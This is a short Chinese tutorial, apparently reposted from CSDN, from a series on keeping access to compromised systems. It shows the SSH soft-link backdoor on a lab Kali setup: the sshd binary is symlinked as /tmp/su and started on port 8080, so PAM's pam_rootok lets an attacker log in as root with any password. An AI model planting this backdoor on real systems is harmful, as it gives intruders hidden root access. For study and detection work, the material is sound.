操作系统权限维持(十)之Linux系统-SSH 软连接后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门

SSH 软连接后门

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测 uid 0 即可认证成功,这样就导致了可以使用任意密码登录:

实验环境

机器名 IP 属性
kali 192.168.52.130 攻击机
kali 192.168.52.132 靶机

在靶机上执行

ln -sf /usr/sbin/sshd /tmp/su 
/tmp/su -oPort=8080

在这里插入图片描述

在攻击机上执行

ssh [email protected] -p 8080

命令执行完后,密码随便输入,就登陆到了靶机的root用户

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_64973687/article/details/129794977